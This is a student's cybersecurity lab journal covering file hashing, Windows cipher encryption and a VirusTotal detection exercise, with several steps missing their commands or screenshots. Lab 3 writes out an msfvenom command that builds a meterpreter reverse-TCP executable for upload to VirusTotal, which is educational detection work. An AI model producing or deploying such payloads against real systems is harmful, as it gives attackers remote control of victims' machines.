Lab Journal
Lab Journal
Lab manual
Submitted By
Umair Saeed (28440)
Submitted To
Safeer Ahmed
BS Cyber Security
3rd Semester
Fall-2024
Step 2:
Now to generate hashes we will open the command prompt and navigate to the directory where
our file is located and type the following:
Now we will copy the file and again check hashes of file in other directory like Pictures or
somewhere else and we will see hashes will be same because file integrity is not doubtful:
Method for linux will also be same just some tools or commands difference.
Lab2:
Encrypting and decrytping files in windows using cipher utility:
Encrytping file:
For this we will open command prompt and navigate to the directory where is our targeted file
and then we will type this command
Cipher /e filename
We will see a little lock icon on that file and if we will open this file outside our windows
machine or other user account in same window machine then it will not be opened the file.
Now file is encrypted and can be decrypted only in same window machine
Lab 3:
In this module we will discuss about malware detection using famous online platform
called as virus total for this we will generate a malware in metasploit and then we will test it with
virustotal for this you need to visit the following site:
https://www.virustotal.com/gui/
Now we will generate malware in msf by following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=0.0.0.0 lport=9999 -o virus.exe
This is our virus total result